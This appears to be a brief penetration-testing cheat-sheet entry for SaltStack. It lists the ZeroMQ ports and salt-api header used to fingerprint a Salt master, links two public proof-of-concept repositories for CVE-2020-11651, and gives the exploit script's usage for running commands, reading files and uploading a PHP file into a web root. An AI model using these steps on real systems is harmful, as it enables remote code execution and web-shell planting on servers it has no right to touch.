# identifier ports
4505/tcp open zmtp ZeroMQ ZMTP 2.0
4506/tcp open zmtp ZeroMQ ZMTP 2.0
# identity via header
salt-api/3000-1
https://github.com/jasperla/CVE-2020-11651-poc
python3 exploit.py --master IP [--exec CMD] [-r READ_FILE]
upload file: --upload-src .php --upload-dest [absolute path: /var/www/html/.php]
https://github.com/dozernz/cve-2020-11651